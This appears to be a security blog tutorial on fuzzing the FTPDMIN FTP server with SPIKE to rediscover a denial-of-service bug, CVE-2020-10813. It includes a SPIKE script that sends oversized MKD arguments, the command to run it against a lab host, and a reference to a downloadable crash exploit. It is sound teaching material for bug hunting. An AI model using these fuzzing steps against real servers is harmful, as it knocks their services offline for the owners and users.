Welcome. In this article, we will rediscover a Denial of Service vulnerability (CVE-2020-10813) in FTPDMIN and go through the process of how this vulnerability was discovered. The techniques you will learn can be applied for bug hunting on other services as well, so make sure to pay attention to what’s being done.

In this article we will be using a Kali Linux machine with SPIKE installed and a Windows machine with FTPDMIN installed. You can find more information about SPIKE here.

To install SPIKE on Kali Linux, do the following:

apt update && apt install spike

After executing the command, you can verify the installation by doing

line_send_tcp

You should see the output looking something like this:

SPIKE

After you have confirmed your installation, boot up your Windows machine and download FTPDMIN. You can get it here. Having an instance of FTPDMIN will be necessary for us to build our exploit.

Run the FTPDMIN executable:

FTPDMIN

You will notice that it will display your Windows machine local IP address (in our case it’s 192.168.1.113). This is the host that you’re going to fuzz from your Kali Linux machine.

Now we have to set up our fuzzing script, since SPIKE is a script based fuzzer. The script syntax for an FTP service is as follows:

s_string(“USER anonymous”);
s_string(“rn”);
s_string(“PASS anonymous”);
s_string(“rn”);
s_string(“MKD “);
s_string_variable(“FUZZ”);
s_string(“rn”);

s_string(“EXITrn”);

This will open an anonymous user session and will try to create a directory with the fuzz payload (variable FUZZ). Save this script as ‘script.spk’.

Now we will have to run this script through SPIKE. To do so, execute the following command:

line_send_tcp <FTP server IP> 21 script.spk 0 0

This will run all the payloads through the script to the target FTP target IP.

After starting SPIKE and running it after a while you’ll start seeing something like this:

This confirms that we have successfully crashed the FTPDMIN instance. However, just to make sure, you can check what your Windows machine shows

Stop your SPIKE script by hitting Control+C and observe the output of the script. Look for the point where the “Couldn’t tcp connect to target” messages start. You will see something like this:

What we can tell from these lines is that when SPIKE sent a payload with the size of 420 characters, the FTPDMIN service crashed and no longer accepted incoming TCP packets.

Now that we have successfully identified the vulnerability and the requirements to reproduce it, we can employ our FTPDMIN exploit. You can download it here. To run it, just change the IP address in the script to your target IP address and run it:

python3 ftpdmin_exploit.py

To confirm that the exploit works, refer to your Windows machine:

FTPDMIN Exploit

That concludes our article on FTPDMIN Denial of Service. If you found this useful, please consider sharing this post on social media or subscribing to our newsletter. Good luck and happy hacking.